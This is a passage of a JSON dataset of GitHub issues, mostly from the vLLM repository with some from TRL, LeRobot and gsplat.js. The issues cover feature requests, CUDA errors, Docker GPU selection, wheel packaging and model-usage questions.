#4223\n- BCO migration (completed): #4312", "url": "https://github.com/huggingface/trl/issues/4461", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u2728 enhancement", "\ud83c\udfcb Online DPO" ], "created_at": "2025-11-05T21:28:08Z", "updated_at": "2025-11-24T01:13:07Z", "comments": 1, "user": "behroozazarkhalili" }, { "repo": "vllm-project/vllm", "number": 28152, "title": "[Feature]: Factor out `zero_expert_num` from `FusedMoE`", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nWe have many special cases in `FusedMoE` for `zero_expert_num`\n\nThis parameter is used exclusively for `LongCatFlash`. We should factor this out of `FusedMoe` and put the complexity into the model file.\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28152", "state": "open", "labels": [ "help wanted", "feature request" ], "created_at": "2025-11-05T19:05:54Z", "updated_at": "2025-11-06T20:08:23Z", "comments": 0, "user": "robertgshaw2-redhat" }, { "repo": "vllm-project/vllm", "number": 28150, "title": "[Bug]: -O.mode=NONE (or -cc.mode=NONE) should work", "body": "### Your current environment\n\nmain\n\n### \ud83d\udc1b Describe the bug\n\nRight now -O.mode only accepts integer levels. Ideally it would accept ints and the string.\n\n`vllm serve -O.mode=NONE` # doesn't work\n`vllm serve -O.mode=0` # does work\n\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28150", "state": "closed", "labels": [ "bug", "help wanted", "good first issue", "torch.compile" ], "created_at": "2025-11-05T18:28:23Z", "updated_at": "2025-11-12T00:46:20Z", "comments": 1, "user": "zou3519" }, { "repo": "vllm-project/vllm", "number": 28137, "title": "[Feature]: Refactor `aiter_shared_expert_fusion`", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nWe have a special case in `FusedMoE` layer for `aiter_shared_expert_fusion` which creates various if branches spattered across the layer\n\nWe should factor this out\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28137", "state": "open", "labels": [ "help wanted" ], "created_at": "2025-11-05T15:54:09Z", "updated_at": "2025-12-20T22:00:55Z", "comments": 3, "user": "robertgshaw2-redhat" }, { "repo": "vllm-project/vllm", "number": 28132, "title": "[Usage]: How do I assign a specific GPU to a vLLM docker container?", "body": "### Your current environment\n\nstock vllm-openai:v0.11.0 docker image\nrootless Docker v.27.5.1 on Ubuntu 22.04.5 LTS on physical hardware\nNvidia Driver Version: 570.133.20\nCUDA Version: 12.8\nGPUs: 4x H100 (NVLink), numbered 0,1,2,3\n\n### How would you like to use vllm\n\nI want to run inference of [SmolLM3-3B](https://huggingface.co/HuggingFaceTB/SmolLM3-3B). The exact model doesn't matter, this happens with other models as well.\n\ni want to run this model using Docker. This basically works. However, it alway picks a different GPU than what i specify in CUDA_VISIBLE_DEVICES. Out of my four GPUs, 0 and 1 are idle. I would like the container to use GPU 0. But no matter what I try, it always decides to run on GPU 1. I can verify this using `nvtop`.\n\nThis is my compose file:\n```yaml\nservices:\n vllm-smol:\n container_name: smollm-3b\n image: vllm/vllm-openai:v0.11.0\n volumes:\n - ./smollm-3b/models:/models\n gpus: \"all\"\n environment:\n HF_HOME: \"/models\"\n CUDA_VISIBLE_DEVICES: \"0\"\n command: >\n --model HuggingFaceTB/SmolLM3-3B\n --enable-auto-tool-choice\n --tool-call-parser=hermes\n --gpu-memory-utilization 0.1875\n labels:\n```\nThis way, the vLLM container starts and inferencing runs fine. But it decides to use GPU 1 instead of GPU 0\n\ni have also tried this, as docker compose will only accept `gpus: \"all\"`:\n```yaml\ndocker run -d \\\n --name smollm-3b \\\n -v \"$(pwd)/smollm-3b/models:/models\" \\\n --gpus \"device=0\" \\\n -e HF_HOME=\"/models\" \\\n -e CUDA_VISIBLE_DEVICES=\"0\" \\\n vllm/vllm-openai:v0.11.0 \\\n --model HuggingFaceTB/SmolLM3-3B \\\n --enable-auto-tool-choice \\\n --tool-call-parser=hermes \\\n --gpu-memory-utilization 0.1875\n```\nThis gives me an error during container startup: `RuntimeError: No CUDA GPUs are available`\nOmitting `CUDA_VISIBLE_DEVICES` gives the same error.\n\nAnd finally, there is also this attempt:\n```yaml\nservices:\n vllm-smol:\n container_name: smollm-3b\n image: vllm/vllm-openai:v0.11.0\n volumes:\n - ./smollm-3b/models:/models\n deploy:\n resources:\n reservations:\n devices:\n - driver: nvidia\n device_ids: ['0']\n capabilities: [gpu]\n environment:\n HF_HOME: \"/models\"\n # CUDA_VISIBLE_DEVICES: \"0\"\n command: >\n --model HuggingFaceTB/SmolLM3-3B\n --enable-auto-tool-choice\n --tool-call-parser=hermes\n --gpu-memory-utilization 0.1875\n```\nErrors are, once again, identical with and without `CUDA_VISIBLE_DEVICES`: `RuntimeError: No CUDA GPUs are available`\n\nAm I doing something fundamentally wrong here? All i want is to use a specific GPU (GPU 0 in my case)\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28132", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-05T14:42:17Z", "updated_at": "2025-11-06T14:54:41Z", "comments": 1, "user": "lindner-tj" }, { "repo": "huggingface/lerobot", "number": 2389, "title": "How to resolve the issue that GROOT cannot train properly? Below is my training configuration and error log.", "body": "How to resolve the issue that GROOT cannot train properly? Below is my training configuration and error log.\n\naccelerate launch \\\n --multi_gpu \\\n --num_processes=2 \\\n $(which lerobot-train) \\\n --output_dir=./outputs/groot_training \\\n --save_checkpoint=true \\\n --batch_size=8 \\\n --steps=200000 \\\n --save_freq=20000 \\\n --log_freq=200 \\\n --policy.type=groot \\\n --policy.push_to_hub=false \\\n --policy.repo_id=your_repo_id \\\n --dataset.root=/home/ruijia/wxl/data/train_segdata_wrist_20251028_200/ \\\n --dataset.repo_id=ur_wrist_data \\\n --wandb.enable=false \\\n --wandb.disable_artifact=false \\\n --job_name=grapdata\n\n\n\n[rank1]:[W1105 18:09:16.255729052 CUDAGuardImpl.h:119] Warning: CUDA warning: an illegal memory access was encountered (function destroyEvent)\nterminate called after throwing an instance of 'c10::Error'\n[rank1]:[E1105 18:09:16.257152106 ProcessGroupNCCL.cpp:1899] [PG ID 0 PG GUID 0(default_pg) Rank 1] Process group watchdog thread terminated with exception: CUDA error: an illegal memory access was encountered\nCUDA kernel errors might be asynchronously reported at some other API call, so the stacktrace below might be incorrect.\nFor debugging consider passing CUDA_LAUNCH_BLOCKING=1\nCompile with `TORCH_USE_CUDA_DSA` to enable device-side assertions.\n\nException raised from c10_cuda_check_implementation at /pytorch/c10/cuda/CUDAException.cpp:43 (most recent call first):\nframe #0: c10::Error::Error(c10::SourceLocation, std::__cxx11::basic_string, std::allocator >) + 0x98 (0x7c3dcab785e8 in /home/ruijia/miniconda3/envs/lerobot_pi05/lib/python3.10/site-packages/torch/lib/libc10.so)", "url": "https://github.com/huggingface/lerobot/issues/2389", "state": "open", "labels": [ "training" ], "created_at": "2025-11-05T10:17:59Z", "updated_at": "2025-11-07T17:47:50Z", "user": "wuxiaolianggit" }, { "repo": "huggingface/lerobot", "number": 2388, "title": "how to improve the generalization of the vla model like gr00t", "body": "After fine-tuning the gr00t, i found that it only work for the prompt within the dataset, it is difficult for it to understand new words and new item that need to grab. \nso whether there is a method can protect the generalization, if i can create a new layer to map the output of the model to new dimensionality?", "url": "https://github.com/huggingface/lerobot/issues/2388", "state": "open", "labels": [], "created_at": "2025-11-05T10:06:11Z", "updated_at": "2025-11-05T10:44:38Z", "user": "Temmp1e" }, { "repo": "vllm-project/vllm", "number": 28119, "title": "[Feature]: Will we support async scheduler for pipeline parallel?", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nSGLang already have https://github.com/sgl-project/sglang/pull/11852\n\nAnd I see huge perf gap on SM120 PP because of this.\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28119", "state": "closed", "labels": [ "feature request" ], "created_at": "2025-11-05T09:55:57Z", "updated_at": "2025-11-07T06:14:19Z", "comments": 4, "user": "weireweire" }, { "repo": "huggingface/gsplat.js", "number": 122, "title": "I want to add an object (such as a robot) to move around in the model. How can this be achieved?", "body": "I want to add an object (such as a robot) to move around in the model. How can this be achieved?", "url": "https://github.com/huggingface/gsplat.js/issues/122", "state": "open", "labels": [], "created_at": "2025-11-05T09:16:39Z", "updated_at": "2025-11-05T09:16:39Z", "user": "ThinkingInGIS" }, { "repo": "vllm-project/vllm", "number": 28104, "title": "[Usage]: vllm bench serve\u4e0d\u80fd\u7528sharegpt\u6570\u636e\u96c6", "body": "### Your current environment\n\n```text\n\u6211\u8fd0\u884c\u4ee5\u4e0bbencmmarks\u547d\u4ee4\uff1avllm bench serve --model Qwen3 --tokenizer /mnt/workspace/models --host 127.0.0.1 --port 80 --num-prompts 400 --percentile-metrics ttft,tpot,itl,e2el --metric-percentiles 90,95,99 --dataset-name sharegpt --data\nset-path /mnt/workspace/benchmarks/sharegpt/ShareGPT_V3_unfiltered_cleaned_split.json --sharegpt-output-len 512\n\u4f1a\u62a5\u4e00\u4e0b\u9519\u8bef\uff1a/usr/local/lib/python3.12/dist-packages/torch/cuda/init.py:61: FutureWarning: The pynvml package is deprecated. Please install nvidia-ml-py instead. If you did not install pynvml directly, please report this to the maintainers of the package that installed pynvml for you.\nimport pynvml # type: ignore[import]\nINFO 11-04 22:14:30 [init.py:243] Automatically detected platform cuda.\nINFO 11-04 22:14:32 [init.py:31] Available plugins for group vllm.general_plugins:\nINFO 11-04 22:14:32 [init.py:33] - lora_filesystem_resolver -> vllm.plugins.lora_resolvers.filesystem_resolver:register_filesystem_resolver\nINFO 11-04 22:14:32 [init.py:36] All plugins in this group will be loaded. Set to control which plugins to load.\nusage: vllm bench serve [options]\nvllm bench [options] serve: error: argument --dataset-name: invalid choice: 'sharegpt' (choose from random). \u8bf7\u95ee\u4e3a\u4ec0\u4e48\u6211\u8fd9\u4e2a\u4f1a\u62a5\u9519\uff1f\uff1f\uff1fVLLM_PLUGINS\n```\n\n\n### How would you like to use vllm\n\nhow to solve it\uff1f\uff1f\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28104", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-05T06:18:02Z", "updated_at": "2025-11-06T14:24:46Z", "comments": 1, "user": "uOnePiece" }, { "repo": "vllm-project/vllm", "number": 28070, "title": "[Usage]: Is there a way to control default thinking behaviour of a model?", "body": "### Your current environment\n\nIs there a way to control default thinking behaviour for models deployed through vllm.\nAs per https://docs.vllm.ai/en/stable/features/reasoning_outputs.html,\nIBM Grantie 3.2 reasoning is disabled by default.\nQwen3, GLM 4.6, Deepseek V3.1 all have reasoning enabled by default.\nIt would be great if there is a way to control this from vllm.\n--override-generation-config allows user to override temperature and other params at deployment.\nBut this does not work for reasoning.\nI have tried\n`docker run -d --runtime nvidia -e TRANSFORMERS_OFFLINE=1 -e DEBUG=\"true\" -p 8000:8000 --ipc=host vllm/vllm-openai:v0.11.0 --reasoning-parser qwen3 --model Qwen/Qwen3-4B --override-generation-config '{\"chat_template_kwargs\": {\"enable_thinking\": false}}'`\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28070", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-04T22:03:32Z", "updated_at": "2025-12-30T03:38:48Z", "comments": 0, "user": "yz342" }, { "repo": "vllm-project/vllm", "number": 28056, "title": "[Bug]: Missing libarm_compute.so in Arm CPU pip installed wheels", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nWe now have vllm wheels for Arm CPUs in pypi thanks to https://github.com/vllm-project/vllm/pull/26931 and https://github.com/vllm-project/vllm/pull/27331\n\nYou can install Arm CPU wheels with:\n```\npip install --pre vllm==0.11.1rc3+cpu --extra-index-url https://wheels.vllm.ai/0.11.1rc3%2Bcpu/\n```\n\nHowever it will currently fail, unless you ldpreload ACL: \n```\nWARNING 10-29 12:33:18 [interface.py:171] Failed to import from vllm._C: ImportError('libarm_compute.so: cannot open shared object file: No such file or directory')\nWe need to figure out how to package libarm_compute.so in the wheel\n ```\n\nBest way to reproduce this locally is: \n- build vllm from main locally with `VLLM_TARGET_DEVICE=cpu python3 setup.py bdist_wheel`\n- remove `vllm/deps` which contains the libarm_compute.so\n- pip install the wheel you built\n\nthen you will run into the issue (because it will try to load libarm_compute.so under vllm/.deps/arm_compute-src/build/)\n\nNote: ACL/oneDNN are built in vllm here: \n\nWe need to figure out how to bundle `libarm_compute.so` in the wheel to avoid this.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28056", "state": "closed", "labels": [ "bug" ], "created_at": "2025-11-04T17:22:55Z", "updated_at": "2025-11-13T05:43:10Z", "comments": 2, "user": "fadara01" }, { "repo": "vllm-project/vllm", "number": 28046, "title": "Qwen3-Omni model inference : ValueError: Either SamplingParams or PoolingParams must be provided.", "body": "### Your current environment\n\n```text\nThe output of `python web_demo.py`\n```\n\nThe above mentioned method provides the error below \n```\n\nqwen/Qwen3-Omni/collect_env.py\", line 287, in get_vllm_version\n from vllm import __version__, __version_tuple__\nImportError: cannot import name '__version__' from 'vllm' (unknown location)\n```\nwhile the envs installed are below:\n\n```\n\n pip list\nPackage Version Editable project location\n--------------------------------- --------------------------------- ----------------------------------------------------------\naccelerate 1.11.0\naiofiles 24.1.0\naiohappyeyeballs 2.6.1\naiohttp 3.13.2\naiosignal 1.4.0\nairportsdata 20250909\nannotated-doc 0.0.3\nannotated-types 0.7.0\nanyio 4.11.0\nastor 0.8.1\nasync-timeout 5.0.1\nattrs 25.4.0\naudioread 3.1.0\nav 16.0.1\nblake3 1.0.8\nBrotli 1.1.0\ncachetools 6.2.1\ncertifi 2025.10.5\ncffi 2.0.0\ncharset-normalizer 3.4.4\nclick 8.2.1\ncloudpickle 3.1.2\ncmake 4.1.2\ncompressed-tensors 0.10.2\ncupy-cuda12x 13.6.0\ndecorator 5.2.1\ndepyf 0.18.0\ndill 0.4.0\ndiskcache 5.6.3\ndistro 1.9.0\ndnspython 2.8.0\neinops 0.8.1\nemail-validator 2.3.0\nexceptiongroup 1.3.0\nfastapi 0.121.0\nfastapi-cli 0.0.14\nfastapi-cloud-cli 0.3.1\nfastrlock 0.8.3\nffmpy 0.6.4\nfilelock 3.20.0\nflash_attn 2.8.3\nfrozenlist 1.8.0\nfsspec 2025.10.0\ngguf 0.17.1\ngradio 5.44.1\ngradio_client 1.12.1\ngroovy 0.1.2\nh11 0.16.0\nhf-xet 1.2.0\nhttpcore 1.0.9\nhttptools 0.7.1\nhttpx 0.28.1\nhuggingface-hub 0.36.0\nidna 3.11\ninteregular 0.3.3\nJinja2 3.1.6\njiter 0.11.1\njoblib 1.5.2\njsonschema 4.25.1\njsonschema-specifications 2025.9.1\nlark 1.2.2\nlazy_loader 0.4\nlibrosa 0.11.0\nllguidance 0.7.30\nllvmlite 0.44.0\nlm-format-enforcer 0.10.12\nmarkdown-it-py 4.0.0\nMarkupSafe 3.0.3\nmdurl 0.1.2\nmistral_common 1.8.5\nmpmath 1.3.0\nmsgpack 1.1.2\nmsgspec 0.19.0\nmultidict 6.7.0\nnest-asyncio 1.6.0\nnetworkx 3.4.2\nninja 1.13.0\nnumba 0.61.2\nnumpy 2.2.6\nnvidia-cublas-cu12 12.6.4.1\nnvidia-cuda-cupti-cu12 12.6.80\nnvidia-cuda-nvrtc-cu12 12.6.77\nnvidia-cuda-runtime-cu12 12.6.77\nnvidia-cudnn-cu12 9.5.1.17\nnvidia-cufft-cu12 11.3.0.4\nnvidia-cufile-cu12 1.11.1.6\nnvidia-curand-cu12 10.3.7.77\nnvidia-cusolver-cu12 11.7.1.2\nnvidia-cusparse-cu12 12.5.4.2\nnvidia-cusparselt-cu12 0.6.3\nnvidia-nccl-cu12 2.26.2\nnvidia-nvjitlink-cu12 12.6.85\nnvidia-nvtx-cu12 12.6.77\nopenai 1.90.0\nopencv-python-headless 4.12.0.88\norjson 3.11.4\noutlines 0.1.11\noutlines_core 0.1.26\npackaging 25.0\npandas 2.3.3\npartial-json-parser 0.2.1.1.post6\npillow 11.3.0\npip 25.2\nplatformdirs 4.5.0\npooch 1.8.2\nprometheus_client 0.23.1\nprometheus-fastapi-instrumentator 7.1.0\npropcache ", "url": "https://github.com/vllm-project/vllm/issues/28046", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-04T13:59:57Z", "updated_at": "2025-11-24T19:24:39Z", "comments": 22, "user": "Tortoise17" }, { "repo": "vllm-project/vllm", "number": 28045, "title": "[Doc]: Any detailed documentation about how to load_weights in customized vllm model?", "body": "### \ud83d\udcda The doc issue\n\nI don't know how to modify the attention and how the load_model works.\n\nThe documentation says too few, I find it's hard to understand.\n\nAnyone has some more detailed experience? Thank you!\n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28045", "state": "open", "labels": [ "documentation" ], "created_at": "2025-11-04T13:23:25Z", "updated_at": "2025-11-05T02:07:55Z", "comments": 0, "user": "sleepwalker2017" }, { "repo": "vllm-project/vllm", "number": 28035, "title": "[Usage]: deepseek-ocr The output token count is too low and unstable.", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\npython3 -m vllm.entrypoints.openai.api_server --served-model-name deepseek-ocr --model deepseekocr --tensor-parallel-size 1 --gpu-memory-utilization 0.95 --disable-log-requests --logits_processors vllm.model_executor.models.deepseek_ocr:NGramPerReqLogitsProcessor\n\n {\n \"model\": \"DeepSeek-OCR\",\n \"messages\": [{\n \"role\": \"user\",\n \"content\": [\n {\n \"type\": \"image_url\",\n \"image_url\": {\"url\": f\"data:image/jpeg;base64,{self.image_to_base64(image_path)}\"}\n },\n {\"type\": \"text\", \"text\": \u201d\\nFree OCR.\u201c}\n ]\n }],\n \"vllm_xargs\": {\n \"ngram_size\": 30,\n \"window_size\": 100,\n \"whitelist_token_ids\": \"[128821, 128822]\"\n },\n \"temperature\": 0.0,\n \"max_tokens\": 4096\n }\n\n\n\"finish_reason\":\"stop\" but \"completion_tokens\":200+ \uff0ccannot output the complete image content.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28035", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-04T09:50:53Z", "updated_at": "2025-11-04T09:50:53Z", "comments": 0, "user": "sixgod-666" }, { "repo": "vllm-project/vllm", "number": 28031, "title": "[Usage]: Error: Failed to initialize the TMA descriptor 700", "body": "### Your current environment\n\nvllm0.11.0 to train Qwen3-vl-8B \n\nThe following error message appears intermittently during training.\n```\n[36m(WorkerDict pid=82555)\u001b[0m TMA Desc Addr: 0x7f4e2736b080\n\u001b[36m(WorkerDict pid=82555)\u001b[0m format 9\n\u001b[36m(WorkerDict pid=82555)\u001b[0m dim 4\n\u001b[36m(WorkerDict pid=82555)\u001b[0m gmem_address 0xa9bdcd0000\n\u001b[36m(WorkerDict pid=82555)\u001b[0m globalDim (128,415,2,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m globalStrides (2,2048,1024,0,0)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m boxDim (64,128,1,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m elementStrides (1,1,1,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m interleave 0\n\u001b[36m(WorkerDict pid=82555)\u001b[0m swizzle 3\n\u001b[36m(WorkerDict pid=82555)\u001b[0m l2Promotion 2\n\u001b[36m(WorkerDict pid=82555)\u001b[0m oobFill 0\n\u001b[36m(WorkerDict pid=82555)\u001b[0m Error: Failed to initialize the TMA descriptor 700\n\u001b[36m(WorkerDict pid=82555)\u001b[0m TMA Desc Addr: 0x7f4e2736b080\n\u001b[36m(WorkerDict pid=82555)\u001b[0m format 9\n\u001b[36m(WorkerDict pid=82555)\u001b[0m dim 4\n\u001b[36m(WorkerDict pid=82555)\u001b[0m gmem_address 0xa46a000000\n\u001b[36m(WorkerDict pid=82555)\u001b[0m globalDim (128,16,2,61647,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m globalStrides (2,512,256,8192,0)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m boxDim (64,128,1,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m elementStrides (1,1,1,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m interleave 0\n\u001b[36m(WorkerDict pid=82555)\u001b[0m swizzle 3\n\u001b[36m(WorkerDict pid=82555)\u001b[0m l2Promotion 2\n\u001b[36m(WorkerDict pid=82555)\u001b[0m oobFill 0\n\u001b[36m(WorkerDict pid=82555)\u001b[0m Error: Failed to initialize the TMA descriptor 700\n\u001b[36m(WorkerDict pid=82555)\u001b[0m TMA Desc Addr: 0x7f4e2736b080\n\u001b[36m(WorkerDict pid=82555)\u001b[0m format 9\n\u001b[36m(WorkerDict pid=82555)\u001b[0m dim 4\n\u001b[36m(WorkerDict pid=82555)\u001b[0m gmem_address 0xa48819e000\n\u001b[36m(WorkerDict pid=82555)\u001b[0m globalDim (128,16,2,61647,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m globalStrides (2,512,256,8192,0)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m boxDim (64,128,1,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m elementStrides (1,1,1,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m interleave 0\n\u001b[36m(WorkerDict pid=82555)\u001b[0m swizzle 3\n\u001b[36m(WorkerDict pid=82555)\u001b[0m l2Promotion 2\n\u001b[36m(WorkerDict pid=82555)\u001b[0m oobFill 0\n\u001b[36m(WorkerDict pid=82555)\u001b[0m Error: Failed to initialize the TMA descriptor 700\n\u001b[36m(WorkerDict pid=82555)\u001b[0m TMA Desc Addr: 0x7f4e2736b080\n\u001b[36m(WorkerDict pid=82555)\u001b[0m format 9\n\u001b[36m(WorkerDict pid=82555)\u001b[0m dim 4\n\u001b[36m(WorkerDict pid=82555)\u001b[0m gmem_address 0xa46a000000\n\u001b[36m(WorkerDict pid=82555)\u001b[0m globalDim (128,16,2,61647,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m globalStrides (2,512,256,8192,0)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m boxDim (64,128,1,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m elementStrides (1,1,1,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m interleave 0\n\u001b[36m(WorkerDict pid=82555)\u001b[0m swizzle 3\n\u001b[36m(WorkerDict pid=82555)\u001b[0m l2Promotion 2\n\u001b[36m(WorkerDict pid=82555)\u001b[0m oobFill 0\n\u001b[36m(WorkerDict pid=82555)\u001b[0m Error: Failed to initialize the TMA descriptor 700\n\u001b[36m(WorkerDict pid=82555)\u001b[0m TMA Desc Addr: 0x7f4e2736b080\n\u001b[36m(WorkerDict pid=82555)\u001b[0m format 9\n\u001b[36m(WorkerDict pid=82555)\u001b[0m dim 4\n\u001b[36m(WorkerDict pid=82555)\u001b[0m gmem_address 0xa48819e000\n\u001b[36m(WorkerDict pid=82555)\u001b[0m globalDim (128,16,2,61647,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m globalStrides (2,512,256,8192,0)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m boxDim (64,128,1,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m elementStrides (1,1,1,1,1)\n\u001b[36m(WorkerDict pid=82555)\u001b[0m interleave 0\n\u001b[36m(WorkerDict pid=82555)\u001b[0m swizzle 3\n\u001b[36m(WorkerDict pid=82555)\u001b[0m l2Promotion 2\n\u001b[36m(WorkerDict pid=82555)\u001b[0m oobFill 0\n\u001b[36m(WorkerDict pid=82555)\u001b[0m Error: Failed to initialize the TMA descriptor 700\n\u001b[36m(WorkerDict pid=82555)\u001b[0m CUDA error (/workspace/.deps/vllm-flash-attn-src/hopper/flash_fwd_launch_template.h:191): an illegal memory access was encountered\n\u001b[36m(WorkerDict pid=82558)\u001b[0m l2Promotion 2\n\u001b[36m(WorkerDict pid=82558)\u001b[0m l2Promotion 2\n\u001b[36m(WorkerDict pid=82558)\u001b[0m l2Promotion 2\n\u001b[36m(WorkerDict pid=82558)\u001b[0m l2Promotion 2\n\u001b[36m(WorkerDict pid=82558)\u001b[0m l2Promotion 2\n```\n\n\nthen the error message below is being repeated, but training has not stopped.\n\n```\n[36m(WorkerDict pid=134586)\u001b[0m [rank7]:[W1104 07:52:01.751088784 TCPStore.cpp:125] [c10d] recvValue failed on SocketImpl(fd=90, addr=[train-kubeflow-72-46805-20251104102107-master-0]:49384, remote=[train-kubeflow-72-46805-20251104102107-master-0]:32991): Connection reset by peer\u001b[32m [repeated 6x across cluster]\u001b[0m\n\u001b[36m(WorkerDict pid=134586)\u001b[0m Exception raised from recvBytes at /pytorch/torch/csrc/distributed/c10d/Utils.hpp:679 (most recent call first):\u001b[32m [repeated 6x across cluster]\u001b[0m\n\u001b[36m(WorkerDict pid=134580)\u001b[0m frame #0: c10::Error::Error(c10::SourceLocation, std::__cxx11::ba", "url": "https://github.com/vllm-project/vllm/issues/28031", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-04T08:13:45Z", "updated_at": "2025-12-11T08:18:15Z", "comments": 4, "user": "DBMing" }, { "repo": "vllm-project/vllm", "number": 28016, "title": "[Usage]: How to recognize PDFs in DeepSeek-OCR with openai", "body": "### Your current environment\n```\nvllm serve deepseek-ai/DeepSeek-OCR --logits_processors vllm.model_executor.models.deepseek_ocr.NGramPerReqLogitsProcessor --no-enable-prefix-caching --mm-processor-cache-gb 0\n```\n\n\n\n### How would you like to use vllm\n\nHow to recognize PDFs and convert PDFs to Markdown with DeepSeek-OCR via an OpenAI-compatible API?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28016", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-04T03:35:38Z", "updated_at": "2025-11-04T07:33:07Z", "comments": 2, "user": "shoted" }, { "repo": "vllm-project/vllm", "number": 28003, "title": "[Usage]:", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : version 4.1.0\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 (main, Jun 4 2025, 08:56:18) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-6.8.0-54-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : GPU 0: NVIDIA H100 NVL\nNvidia driver version : 570.86.10\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 48\nOn-line CPU(s) list: 0-47\nVendor ID: AuthenticAMD\nModel name: AMD EPYC 9654 96-Core Processor\nCPU family: 25\nModel: 17\nThread(s) per core: 1\nCore(s) per socket: 1\nSocket(s): 48\nStepping: 1\nBogoMIPS: 4799.59\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 